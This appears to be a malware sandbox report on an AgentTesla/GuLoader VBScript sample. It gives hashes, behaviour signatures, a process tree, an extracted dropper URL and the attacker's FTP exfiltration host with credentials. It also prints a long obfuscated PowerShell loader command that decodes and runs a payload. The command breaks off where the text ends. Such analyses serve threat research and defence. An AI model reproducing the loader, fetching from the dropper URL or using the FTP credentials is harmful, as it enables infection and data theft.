agenttesla | 3a8e672d0d59855db74d28528c41684357e7e534312f8feb3908c5e4d5856678

Analysis

max time kernel
82s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
13/02/2023, 06:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SOA.vbs
Size

52KB
MD5

3111ae1b6a9e1c173eaf3a7bda34ca7f
SHA1

c2a6e03871105706b5889bd1078a402efc67a268
SHA256

3a8e672d0d59855db74d28528c41684357e7e534312f8feb3908c5e4d5856678
SHA512

5533f1ca1c0588d2fee1b9aa0c1977ac539ebe86db30b1d022239fbc3276e9d87a4c79a399ae68e37a039acac95f7a703ff23070596a7643a33c17baeab79af1
SSDEEP

768:r+1VMDvbrLLMAedsaNLQnxeP+Fs4ofdESVBrps/7hk1+N52K:rvLLYAeCaNMxefwDh

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://megookbpnq.cf/Kvin.snp

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.valvulasthermovalve.cl
Port:
21
Username:
[email protected]
Password:
LILKOOLL14!!

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
28	4712	powershell.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
93	api.ipify.org
94	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4880	caspol.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4712	powershell.exe
4880	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4712 set thread context of 4880	4712	powershell.exe	94

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1300	4880	WerFault.exe	94

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
4324	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4784	powershell.exe
4784	powershell.exe
4180	powershell.exe
4180	powershell.exe
4712	powershell.exe
4712	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4712	powershell.exe
4712	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4180	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	4880	caspol.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4812 wrote to memory of 4324	4812	WScript.exe	79
PID 4812 wrote to memory of 4324	4812	WScript.exe	79
PID 4812 wrote to memory of 4784	4812	WScript.exe	81
PID 4812 wrote to memory of 4784	4812	WScript.exe	81
PID 4812 wrote to memory of 4180	4812	WScript.exe	83
PID 4812 wrote to memory of 4180	4812	WScript.exe	83
PID 4180 wrote to memory of 4712	4180	powershell.exe	85
PID 4180 wrote to memory of 4712	4180	powershell.exe	85
PID 4180 wrote to memory of 4712	4180	powershell.exe	85
PID 4712 wrote to memory of 2304	4712	powershell.exe	93
PID 4712 wrote to memory of 2304	4712	powershell.exe	93
PID 4712 wrote to memory of 2304	4712	powershell.exe	93
PID 4712 wrote to memory of 4880	4712	powershell.exe	94
PID 4712 wrote to memory of 4880	4712	powershell.exe	94
PID 4712 wrote to memory of 4880	4712	powershell.exe	94
PID 4712 wrote to memory of 4880	4712	powershell.exe	94

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOA.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4812
- C:\Windows\System32\ipconfig.exe
  ipconfig /flushdns
  2⤵
  - Gathers network information
  PID:4324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell write-host shell.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overnu = """ShFAbuUbnFacFitGliUnoNdnun foDSmedicMooInlBroUlrBeaNanTi0Ga2Ga Af{Ni Kv su bo PepCoaSrrNoatimVa(In[PrSHitForDeiPrnUrgSl]Fr`$SuRAneCopForMeoLidBauTocCo)Di;Sk Ti`$TuTLlaFonBenMeoStgla Ov=ga Pi'Sp'Na;Re AmWStrBeiGetLoePo-ArHThoFlsIntFl In`$DiTMaakanEgnPtoTrgho;Hy DuWRerOpiKrtFleVo-CoHEnoTisSitBe In`$SmTUnabenManOpoFrgTr;No OuWHyrViiFotSoeRi-VaHProDisDetRe Mo`$GuTReaIlnDinBaoRrgPh;Or Un Fo In Ar`$WlCHehCooBokPoeov Ac=He SvNMaePawFu-unOPibpajDaeancEatSt CabEuyVetOueFu[Hd]Th ov(As`$FaRfoeAtpForTroChdBouSmcIn.PuLsaePenSagTetSahVi Af/at Id2La)Ov;Sp Hi Te Bu DeFBaoolrAm(Il`$OvBchaUngSavDaaom=Ho0St;An Sp`$UnBPoaSugAlvStaFo Ar-GrlEltCy Cr`$DiRKueKnpCarneoLadSuuEacTo.EmLSyetrnEsgputRihKa;Le Bo`$BoBLaaPlgKovSyaKe+ve=St2Mo)Pu{Fo In Ra Ud su Vo Ne os St`$FlCVahCeoAgkGeeTr[Ho`$AnBSuaMigFovAmaAt/Ma2Dr]Co Ko=Ti In[AacSaoPnnSivMaeWarRitAn]ba:Gi:PoTIsoNoBDeyYotFieKu(Ja`$SvRMaeSipInrKooTidTiuAlcHs.RoSPluExbBlsFatskrJuiOfnhegBe(Pe`$PaBFlaLygtbvLaaTy,Fo Rh2Vo)Ir,St Sc1Po6Di)Hu;Ov Du Bi`$QuCIshOpoRakUdeSl[Ko`$PiBAraMegFivfoaUn/Ga2Pt]Bl La=Se Ro(Ap`$SkCFyhPeoSlkReeop[Ci`$ApBAsaAugPavHeaIn/Ar2Fe]Li ba-SnbIdxVaoFirFe Me1By1Be8En)Gu;Ma Pr ma Ti My}To Sk[geSTrtPorMaiLanUdgHe]Re[orSEnyMasAltreeNemSk.DiTOueOnxPotbj.RiEStnLucHaoDedBeiChnSkgSy]Eu:Sm:PhAPrSArCFoINaIBo.KrGHveMatTuSsvtHurPaiAnnAkgBl(ar`$trCSehAfoPrkvoeJe)Va;Sc}Ga`$KnCSchSmumatUg0af=ThDUdeGacSkoPrlProtrrHlaHvnhi0St2sp Ra'be2Ud5An0PaFHe0Kr5Bf0Be2En1Gl3su1OmBBi5Sk8Sk1Ko2Ed1UnAEs1SeADk'Mi;Fa`$SpCBehKvuDitAf1Op=FyDBeeNocinopolRioChrGeaConUf0Ur2Se To'Br3MeBDi1SiFDe1Dr5In0Sc4Pl1Ud9No0Is5Sk1Po9He1De0sy0Va2In5Ru8Br2co1Su1BlFPe1Am8Pe4Sc5Sa4At4bo5In8By2Ha3un1Un8Ko0Do5Br1Di7Ci1Fu0Go1Op3Ko3Dr8ge1Sl7su0Sa2Ro1InFRe0Mo0Re1Ko3un3ErBPe1Ye3Sa0Re2Th1ErENe1Pr9Wa1Fi2Qu0Pa5Sp'Su;Ko`$GuCAnhSauPltEm2An=CuDHneBocBaoBrlDioCorMiaDinAk0Mi2Yi pi'Na3Bi1Te1Wi3Gr0Fr2yo2Cr6Po0Dy4To1Ch9Ca1No5Fr3Ra7Tr1Is2Sk1Pa2Fl0Sk4Ba1Po3In0be5Pa0Sk5Ne'Al;Br`$TeCRehAnufotVe3Bi=ZeDCoeuncLeoinlDaoInrSoaSunSi0Sp2Kr We'Pe2Fr5Op0BeFBa0Mi5Si0da2Gr1Ov3Te1maBHa5Bu8Un2Ap4Fi0Im3Gu1Hy8Un0Te2Sk1SkFAk1MiBNo1In3un5Sl8Ba3SwFTh1ma8Cr0Ti2Po1bo3Wo0Ca4Up1Ob9Mo0fi6Ch2Op5Be1Me3op0El4Ko0Sy0Ph1EvFDe1Pr5sp1Pu3co0Do5Un5Di8Du3BiEAe1Re7De1Re8Lu1Se2Is1DeAFr1ma3sp2Ld4Re1Ar3Ru1Fr0Xy'Un;Ne`$HaCDuhFsuKitSp4Su=moDSleDoctioSalHaoPorSoaErnFo0De2te Sk'Sl0Ps5Te0Pr2Du0Be4In1DeFUn1Om8Un1Bo1yn'ia;Mo`$AvCSehReuBotAl5Ga=KvDEbePrcKooMilOaoSprAbaUnnPr0To2kr Ma'pr3Mo1Br1Co3Ud0Sy2Fo3SeBKn1Sa9Li1Am2Do0du3Oc1ReAQu1mi3Ri3BrEAf1Gu7In1Lr8Om1Fr2Re1CrAJo1Ba3Cu'Sa;Fo`$InCDohMiuNotKl6St=CaDBaeSkcEkoAflGaoMorblaMinAc0In2Sv Cr'hu2Ja4Se2Wo2Op2Sc5Do0Se6Ai1Fj3Le1Hy5Su1CoFUn1Pr7sk1UnASo3Ta8Po1Sv7Pr1brBUn1Po3Sa5SoAPa5un6Vi3coEPo1AtFNo1Sw2Im1St3Mi3Pr4Ar0ByFFi2Ag5Au1StFPu1Fl1Ov5RoAKo5Bu6No2Ad6Gl0Hj3Ci1Ja4Af1OvARe1MiFaf1Yd5Di'Re;To`$PrCHahPruFotUk7Co=BoDSpeSacbooNelMooMirTeaWanPe0Ud2In Ap'Sl2Go4Pr0Un3Mi1Ve8Re0So2Ca1DuFRe1DiBro1Ne3nr5SlAAg5De6Oy3HoBUd1Fo7St1Mo8Ov1br7Ab1St1Dy1Bo3Af1Re2My'Te;Pr`$SyCArhFruHotEf8Gr=FyDFleGhcEnoInlSwoOxrTraBenTh0Gn2Nu Th'Lu2Di4Ul1sv3Sa1Tu0da1MeAAm1En3St1Sk5Hu0Ch2Po1ek3Ca1Mi2De3As2Ov1Ba3Sn1FiAUd1Tu3Se1La1Al1Br7Be0Ca2mi1Kl3sk'Ha;Li`$AcCUnhEkufyttu9Sm=GlDLueFrcLyoStlLaoRerNiaSpnBo0Hy2Da Ho'no3ShFBe1fj8Al3ScBFi1To3Eq1EmBVe1Pr9Va0Da4ep0SpFre3AeBSa1Ka9ti1Ve2Se0Lo3Re1HeAUn1Sp3Su'Le;Sp`$GeSUneAkrHatCouMamDadFliNopJa0Ov=AbDcieBlcBaoAslBooDorReaManfo0Or2Su Se'Re3AnBHe0UnFSp3Hu2Bu1Gi3So1UnAkd1Hu3Sc1Af1Co1Sa7Ud0De2fe1Su3Af2At2St0SlFPo0sp6Em1Sk3Fe'Ve;Li`$yaSAmeEnrVrtOluMamRedSkiGopGr1Di=ReDGlebocReoSalSuoEkrSnaEfnVk0Un2St Ko'Ur3Ca5Tr1ZeASt1de7Ja0Dr5Un0Un5Py5PrAIm5Re6Te2Ny6Ch0Dr3Di1Va4Sa1CuAam1UdFat1gr5El5SvAFe5Cr6Un2my5Bi1Sn3Pe1St7Un1KiAWo1Ca3St1Gr2Im5NrAOp5Bo6Br3Re7Fr1Vi8St0Ir5Ho1CrFPr3In5Me1beADo1En7Ta0pa5in0Kl5Te5PoANo5Re6Te3Ra7Ud0Br3Ln0st2Ta1In9Sk3Ov5Fj1GyAAb1Ki7Ra0Od5Na0Ci5fr'fr;Ud`$MeSMaeSarUltGauSimmedBuinopRe2Fo=FrDKoeSacStoOplTuoHurAtaPhnNo0Co2Ca Ce'Om3guFGl1gr8Pe0Ol0Ad1Re9Pr1FiDes1Mi3Kr'Ba;Se`$ReSStePerLotEpuBamBodSpiSppMi3Mo=FaDSveMocNooInlReoOvrUnaNonFe0En2na Ps'Us2Le6Gu0tr3Ra1Fi4Wa1CoAAu1AkFBu1Al5Vi5UdANo5Pi6An3toESa1DoFAf1Kr2Cy1Ch3Vr3Ca4Pa0ApFSu2Tr5Sq1BlFTh1an1be5TsAPa5de6Ac3Co8Aq1vi3Re0Eu1ap2Ri5Ka1KeAri1Ma9Pu0Be2Pe5siASk5Ac6Hu2li0Ta1udFPr0Co4Tj0Gr2Ou0Up3Pr1El7In1NoAOp'Ph;Sn`$KoSVaeAfrDitSauSkmGodRaiSupAe4Br=UnDFleMacOmopllSkoHirNoapsnsn0Uf2Al Zo'Co2As0St1NuFUn0Fu4Bi0Ci2Me0Ko3Om1De7Un1MoAes3Ek7Re1PrAVe1BeAEf1Aa9Be1Te5bj'Ad;Co`$CeSAdeAkrVrtLauGrmQudRoisepSt5Ap=JaDPoePocHioBelHuoHerInaNenSk0Lu2Su Ta'Br1dd8Ri0Ko2Un1Sc2Su1UdACo1FiACo'Ec;Vo`$ChSOveGerChtmiuEumCadBeiUnpIr6An=ReDOueuncAvobrlPeoprrOvaVinFi0Fa2Ev To'In3Ge8Oc0Go2Of2Eu6To0Pa4Ma1Ho9Pa0Ir2op1Gr3Co1Tu5Bl0Re2Ta2Up0Un1BaFFr0De4An0Sm2Bu0Fo3Af1Ps7Bu1AtABr3ViBIn1Be3Fr1InBEx1Sc9Bj0Pl4Fu0FiFTr'Le;En`$StSPreShrBetFeuBimPadSyiCepMn7In=AmDVieStcVooSplUnoSerPeaRenpo0De2Sk Al'Ma3InFVi3Tr3Ba2PrEIm'St;Eg`$ReSineRerNotkauScmOvdBiiFipTy8Fu=SkDReeDucUnoBrlpaoCarInaSknTe0In2St Re'Al2PrAne'Da;Su`$BlORkdSiiFllReoVimKsegldRh=MaDsteBycKooLalGeoInrGoaUnnCo0Un2Be Hi'Ac2fl3Ma2Sc5Be3Bl3Fa2Un4Pi4Sk5Bo4Fr4Eg'An;Cy`$StRSweCupporMaoTrgDerTraBemPosAn=BoDPaeTicSkoSrlChoArrlaamonPa0Ud2So Ho'Ec3By5Or1Sc7Ti1TuAUn1RyABi2go1St1UvFUp1Om8Ch1Pl2An1Fl9Af0Fo1Re2Ac6Fi0Sp4Ra1Lo9Sp1Ov5Ce3Pr7Bl'Ls;ChfAnuTenEkcPotKuiSpoRanKa slfBekAfpJo Sy{BaPAnaForFraTemUe Ru(Vi`$UnEprnUddPriHjtWhiUnnAl,Br me`$AncBueForAkeIsbLurCaaTrtOv)Ou Bi Ex So Ch Br;Sk`$CoOSarPrgCoabrnSmiDesunathtRu0Wi Ta=ReDSteBrcGloColNooRerAfaHynAk0So2Cy Br'Ud5Fr2ve3ni1st1ge7Re1No4Sa1Re3Fn1En8La1Di2ba0Es3Pr1erBCo5Di6In4NaBHj5Si6De5GrEIn2KlDTa3Fi7di0Dy6sc0Br6Tr3Vi2Mi1Un9Sc1EkBJa1Gr7po1BrFFa1Sh8vr2PtBFj4PlCVo4ToCFi3Et5hy0Ba3ua0Un4ph0Fy4Ba1po3pa1Sm8br0In2Si3Fl2pi1Kl9Hs1MiBTw1No7Hi1TiFCr1Sh8La5Pu8Au3Sr1Re1Vr3Va0St2Ga3Tr7Pe0Be5Ig0Op5Cu1Ha3Br1ChBaf1Ne4In1MrAAr1HaFMi1Ma3Fa0Ku5Vo5EyEBn5StFMa5Uk6Pa0SaABr5Ov6Me2To1pt1HyESv1Hi3gr0Tv4Sl1De3Bo5baBSt3Sy9Me1Sl4Bl1HaCOp1St3Un1an5To0Pr2Cu5Ta6Cr0LoDNa5ge6Br5Su2Te2Hg9Re5No8Le3Mi1Pr1EtADe1Sp9Ca1In4Li1Si7Am1FrAPu3pl7Be0Sd5Sk0De5Hy1va3An1RoBAd1Ve4De1reALy0DoFun3Se5Un1Re7Af1Ab5Gr1MoEOp1Ta3Re5Di6Cy5DeBLy3Di7La1Ha8Je1hu2Re5So6Sa5ca2Ko2Sc9St5He8Ti3MoAHa1Sm9In1Hy5Ru1Hj7Ma0Re2St1BrFKo1Co9Sa1Di8Mi5en8Ac2Vo5Ty0ai6Ab1leACh1FeFPl0Po2Ki5LaEUn5Sk2De2Ak5Tv1Sh3Un0Vi4th0Fi2Fl0de3Br1AfBIn1Ca2No1VoFDi0De6me4MoERa5ReFOu2ToDSt5PaBOp4Ee7ti2EcBFo5Ba8Mo3De3Bo0Jo7Mo0Ny3Ap1Af7Po1DoATj0St5Le5NoEGl5De2Ti3Fo5Ne1piEBi0li3Ry0Ki2Co4So6El5SlFSo5Un6Be0PrBRl5PoFas5Bi8co3Oi1Sm1Ar3Pa0Mo2pr2Ek2An0PoFUm0Un6Af1Ho3Sn5YaEEx5Gn2Or3He5sa1ZiETr0An3ba0Ug2Ch4Im7pl5PaFAr'Pa;Al&Re(Pa`$BiSSteTrrVetUtuEfmovdUniAlpNd7Fl)Sl Mo`$stOBirAfgSkaSnnRaiEdsFaaSptUd0Ju;ak`$OdOStrSagTiaErnWaiCesReaSutAr5As To=Sy StDVgeTrcKaoAnlUdoTrrReasknAn0Um2Ve Co'Ra5Oc2Pr2Re5Ju0DoFLi1Fl8Th0Sk2St1Af7Po1PoDCi0Hi5Ek0Am2Ne0Fl4Gr5St6La4MiBGa5Un6Ut5Cy2Me3Rr1Bn1Gu7Ru1Bi4Pr1Ps3Pa1Be8Em1Lo2Kp0Ty3Sp1FrBTi5Sm8Te3Up1Br1Ge3Br0Ov2Fl3MaBAa1Cl3Ve0Ca2Kf1RaEEm1Fu9Sa1Op2Ho5HvEIn5Gi2Fi3Gr5Fa1BrEJo0St3In0En2Di4Sp4Tr5CoAbr5Au6Bi2GlDAr2Fe2Ud0DoFSo0He6Re1at3Di2UnDOr2GiBFi2HoBIr5sa6Kn3Su6Th5SoEre5Po2Co3Tv5Re1ChERa0Ud3Sl0Vr2Mi4Tu5Mi5FrAUn5Pa6is5An2Co3Fo5Ac1TrEUn0se3Un0ac2Ma4Ko2Ra5blFFo5grFDo'Ru;Ho&Su(Du`$InSInekarPetUpuErmEpdCaiCopEl7Mi)Fr De`$etOSlrWagOpatrnviidysUnaDitSk5Ma;Ad`$brOPerImgNoaManDeiBrsHvabotLa1Er Up=No AnDTrespcSvoBelBioBurMeaFonCh0Be2Gi St'In0Be4Da1Af3Ge0No2No0Ru3Ym0St4Do1He8Dr5Ci6Br5No2Un2Po5Pr0MaFOv1Sa8Mi0Co2St1Sk7Su1noDIs0Ti5Un0Ma2wr0be4Pa5Po8En3EcFSl1Mo8An0Sa0Ac1Ov9Te1LuDAp1Kv3Sc5baESo5Sm2Go1Fa8Fr0Ge3Re1TaAFo1TiAIn5SvAMi5Po6Th3Ec6Bo5OsESt2KiDSp2Fi5Pa0giFUn0Po5Si0Sa2Sn1Uo3Di1SiBDi5Sm8Ac2Va4St0Fu3Sc1Di8La0Tr2Ge1GeFPe1EtBPa1pr3Sm5Gn8Sa3TiFRo1Er8Hu0Bo2Re1Va3Gl0Li4St1Da9Ma0Ka6Dr2Pi5Ha1Pe3Bu0Ho4Br0Kl0St1KuFCa1Ov5Se1sv3Th0Ti5Af5De8Rt3EkEZo1Sl7Gu1Bi8Re1Fo2Na1SuAFe1Fl3Oc2Re4Co1Up3Mo1Gg0An2AnBPh5CrESo3Gi8St1sn3En0My1To5ElBFo3Jo9Fa1An4Br1PrCGu1Te3Bu1Do5fa0Fr2Mi5Co6kr2Fr5Eu0AmFEn0Se5Ac0Fi2An1Pu3pe1BuBgo5Sc8To2Va4Ud0Un3Fa1Ri8Sa0Fi2Sw1TuFBr1ArBVe1Ko3st5Wh8Bl3DeFBu1Om8Sh0Pr2Gj1Sp3Co0Re4Tr1Af9Is0Re6He2Be5Fo1Va3Do0Mi4da0un0Re1CoFCo1Ph5Di1Si3Ci0De5No5Wo8Fa3RaECa1Ki7Hv1Fl8Pr1Fy2Po1RaARa1Ex3Be2An4Br1Sl3To1La0To5FiEDa5TrEAc3Ra8Re1Te3Yd0Se1fe5TrBTa3Sa9Me1Fe4Ko1EkCCo1Et3Di1Ud5Al0Uf2He5Ca6Ub3AmFFo1Sa8Te0Va2Re2Un6Lw0Ov2In0Pa4Ha5FiFSv5InAIn5Kl6By5OvETa5Bo2Fa3Af1Kn1St7Ka1Un4Je1Fo3Si1De8Ph1Ar2Ox0Ha3Di1MaBSe5Gn8gi3Ha1pa1Gr3sv0Ev2Sa3AxBGy1Gr3Ga0Us2Ov1KjEAf1An9St1Bj2De5AuEDe5Ov2Mi3Ph5Ca1BrEJo0Af3El0Fo2Fr4ko3To5BrFMi5BuFSo5So8Bu3InFHe1Pl8Me0Mo0Fo1Bh9lo1AaDFa1To3St5UnEEk5Tu2Fo1op8An0Fi3Pe1GlAUn1KlAPi5FoAfl5La6Ca3Se6Ch5DhEIm5Ta2Ca3Pr3Su1De8Dd1Ef2Le1CuFDe0tr2Dr1spFSi1De8Su5ToFfu5ReFTr5TrFMa5ApFSk5HaAPi5Gr6Ba5Du2Me1Mi5Da1Pa3Sk0St4Re1Fj3Su1Sk4Sa0Hi4fl1In7Af0li2Vi5unFFe5UnFSo'Tu;Wo&Me(Co`$AeSSkeFrrUntBauSomHodZoiBepSp7Ab)Ti ta`$PaORerTrgIdaFrnThiHosOvaAutUb1bo;Un}RgfSluPanSacKetOpiSpoInnGl AvGCeDHeTBr Pl{ViPTiaStrHyaRamDr Ya(Ra[PrPDiaUnrSaaKimNreAntSmeUnrHy(WoPaloUnsDeiActSpiBioSanRe Ja=Wi Tr0fa,Fl NdMFeaBanAsdPuaFitAfoPyrmiyWh fe=ke Su`$JoTunrElubjePo)Ku]In Fy[GrTBryVapSkeGo[Hy]Co]Te Pr`$UnAUdlChgHyeDarCaiKosOm2Kb3Po0Fl,Cl[SkPNiaslrPoaOrmHreMatMaeBurHy(BoPEroDesEditatKiiUnoBencr Ha=Es Le1Sl)ed]Ph Re[JoTAnyHapRoeSp]Fo Fo`$StSFovPaaInjTieStnLudDoeMopSl Ky=Hi Pa[FoVUnoBriTvdBa]Sk)Be;Sh`$FrOTrrNygToaUvnReiAvspraObtve2Ud Ko=Fo MeDCheSocSpoVelHjoCarTraNonul0De2Pe Hi'Ma5to2Mi3CuAco1Tr7Va1Ag4Te0ClFvu0Yp4Te5Ba6Ow4StBIc5Da6He2InDMa3De7Ge0Pr6Di0Ko6Ge3Be2Pe1Fe9Op1FoBLi1Fo7Sj1UbFEr1Lu8Sk2JaBOa4SqCOv4SaCAn3Po5sa0Mi3Re0Pa4En0Ly4Sk1He3de1Sk8Sl0Py2Un3Li2Sa1vr9ge1NoBTi1Ad7sp1heFIn1Af8In5Id8Zo3Ta2Hy1Al3As1Fo0Op1SaFSa1Re8Wc1Pl3To3Lg2Ur0FlFFl1Un8Nd1Qu7ko1foBMi1imFBr1Bo5Fi3Ra7Sa0Se5La0Ta5Un1Re3Ba1saBMg1Bo4St1AlACo0StFRe5DiEFi5QuEMi3Am8Un1Si3An0Ex1Ge5AfBTr3Co9Dr1He4Me1StCta1Pe3St1Ac5Ma0To2Mi5Su6Im2Sm5Pa0PuFTa0La5Pe0Ma2Lu1hu3mu1DyBPl5Di8Of2Go4St1Gr3Li1Me0In1PrASp1Ne3Bi1Je5Ph0In2Or1AlFCi1Ja9No1Re8Re5co8Pr3Sk7mn0Sv5Ov0Fl5Or1Ge3Di1PoBDe1Ku4Un1HoAWo0skFLa3Re8Ba1Jo7Pr1CyBMe1Un3Be5SpECa5Me2Af3ov5Sh1KaEdi0Du3Ha0Ne2Re4MlEKo5CaFPr5PoFEk5ReAMe5Sm6Lr2RaDAn2Fo5Ge0DaFsk0Di5Va0la2sy1Ph3Mi1SkBan5Fr8Sp2Do4Tr1Ag3Sm1Fr0Su1anARe1Ku3Sk1Fo5Ka0Cr2Om1UnFAv1Re9Bu1Tr8ae5ch8Be3To3Ja1RiBAf1AdFCo0Ch2Sa5Up8Ar3ro7My0Me5Rh0Fa5Re1Mo3Ls1TaBDg1Ub4Sp1SeAFl0FjFPe3He4De0Rh3Pr1LnFGe1WaAIn1Hy2Pa1As3No0we4Sh3Em7Ta1Sc5Rd1Ar5Is1De3Lu0To5zo0Co5Ke2ScBFi4koCGe4FiCho2ps4Ta0Tv3Da1Pr8Mo5ReFUn5Ef8lu3Un2Un1Ta3qu1Sa0Po1OmFBr1Ov8Ji1Ve3Ou3En2Br0ChFma1Di8Br1Ma7Tr1foBIn1BeFTa1Bi5Ne3IdBWh1Ha9Hy1Re2Ke0st3Kl1AsAKa1Un3De5AkEai5Sp2As3Pi5Lu1reEGe0No3Ko0Go2Ar4SeFHy5PjAHu5to6Pr5Cp2Hi1Ma0Ja1Ne7In1QuACo0Is5Sa1Re3Gr5SlFSp5Nu8es3Fo2Fe1Vo3Qu1Sv0Al1DaFCh1Va8Ni1st3hi2Co2pl0AsFGy0Sa6Re1Je3Cu5PoENa5Ma2Gr2ma5Gl1Am3Ma0Dr4Sy0Ha2Va0St3Hj1geBNo1ar2Ru1PiFNe0Bl6No4Ar6un5MeATe5Re6He5Ra2Po2Op5fl1Do3Ze0Sp4Re0Ap2Sv0tr3Ov1ReBCr1Te2Al1HvFVa0mi6Po4Mi7To5StAUn5Ko6Im2IdDSe2Ra5Sp0GyFGe0In5wa0As2As1Fa3Ko1SeBGo5Sa8sk3AnBMe0Pu3Un1AsAUn0es2Ve1FiFDi1Sl5Bi1tr7Sc0De5Fo0Ch2In3Sy2Fu1Di3Pe1InANo1Op3Ag1Kr1La1Ca7De0Ne2Re1Pa3Da2ViBBr5UnFom'be;Ul&ur(Hi`$meSOreForSatVeuGlmSkdWhiStpGe7Se)Af Un`$YaOSurKugNeaSlnOpiOusStaSutPo2Sn;Mi`$UdOClrWegPeaOmnMeiUnsAmaSttRe3Fr Sa=Bi LnDGaeSicDeoMolAnoBerAfaCinRe0Ib2Sa sc'Va5Pa2Su3ArAMe1No7Tr1po4ec0OvFSk0St4Gu5Ra8di3Ap2Or1Br3Ri1In0Bi1BlFVa1Me8Sk1Ka3To3Bl5Bi1Ka9Sn1Pr8Mi0En5Ma0He2Fe0Br4Tu0Co3Ro1Po5Va0At2ke1Se9Rh0sa4In5IdEKl5Co2Fo3Un5ep1TiEdo0ph3Tr0si2Se4Me0Si5LaAAn5tu6Os2SyDUn2Un5Ch0PrFVr0Wr5Sl0Sp2Gi1Ba3Fe1KyBNo5Ud8sc2St4Un1Ap3Ka1Li0Si1BaAud1Sm3Br1Ef5Fo0Ne2Pr1CoFMe1Sp9Ke1Nr8Se5ga8mr3Ra5Be1Va7So1LoAHy1GaAAd1BrFHo1er8St1em1br3Mi5Be1Br9Ks1fo8Kj0Dr0Ro1Dy3Pa1Sc8Dy0Ov2St1DaFSa1Gl9mi1Sa8Pr0Sp5Ga2VrBPe4FeCOv4PyCNr2Su5Id0Ud2Be1pu7Du1Sj8Ku1St2Vi1Af7Kl0Fo4Ga1Rm2Uf5ReAIn5Kr6Sk5No2hu3Pr7Im1CyAMa1In1Ud1Be3Ps0No4Fr1ReFGr0Sp5pr4Li4Pr4Cl5Mi4Fy6Ep5NoFBe5Br8Ek2Dr5Re1Af3Ro0Hl2Pa3plFTi1PhBWh0be6Mo1DrAMi1Fj3Cl1cuBAn1Un3Su1Re8te0Po2Sc1Fi7Tr0Er2ba1KyFVi1be9Ha1St8St3Jo0Lu1SkATa1Ra7Na1To1Fi0Cu5Ma5unEAp5Sa2Nu3Bo5ph1PaEku0Ma3Br0Bo2Be4Pi1Re5DeFSk'Sa;De&Sk(Ru`$knSSaeDerAbtTeubemSedReiSlpSk7Re)Ba Da`$AkOTorOygUraFenAriShsInaCltSu3Sh;Sp`$TrOTerEfgBaaAunDiiStsBlaHotMa4Le Op=Da BeDAleKocFroMelMaoPrrLhaFenSt0Un2Qu Ka'Un5Du2Pu3DiAAn1Pe7Sc1Sn4St0SiFEp0Ve4He5La8Go3Dr2Pi1Va3Re1St0Pe1EtFba1Uo8vi1Co3ak3CoBMi1Fe3St0Re2Fa1shEpa1Tr9Ov1ja2Im5TaEGa5Cr2Ni2Ru5He1Ga3Me0An4As0de2Fl0He3Ke1GaBZo1Ti2Pr1SaFVi0Hj6Ra4Ki4Te5MiASa5Ho6Ul5Ar2pa2ho5un1By3Ad0Cl4Ax0Fe2Sa0Ka3Dr1DeBeb1Pa2Wh1FjFAn0Dy6Th4Lo5Af5ChAEn5Gi6La5Kv2po2Bl5In0Ua0Vi1Co7Di1BeCCa1Bu3Fo1Un8Ha1Go2Fo1Kl3Un0Mi6Ef5PoAFo5Mu6Im5Tr2Pl3Mi7Be1BaACo1Sy1Ex1Aa3Gr0Fi4Ha1OpFLa0Ad5Su4Re4em4Bl5An4Fa6My5HoFSl5Co8In2Sl5Ru1La3Li0dr2Ra3CaFFi1ReBta0Qu6mi1UnAou1In3An1ViBDo1Ma3Oo1Mu8co0De2Ex1Lu7Ca0Pi2Gi1shFDi1ra9Nu1Tr8En3Ca0Ma1OpADr1Mu7Sp1Re1Na0Sa5No5BaEKe5Ra2Go3pe5Pr1UnEAf0Ab3Kl0Cu2Ri4Fl1Fi5DiFSp'ta;Te&In(Se`$MaSHeeinrgetApuPlmKodC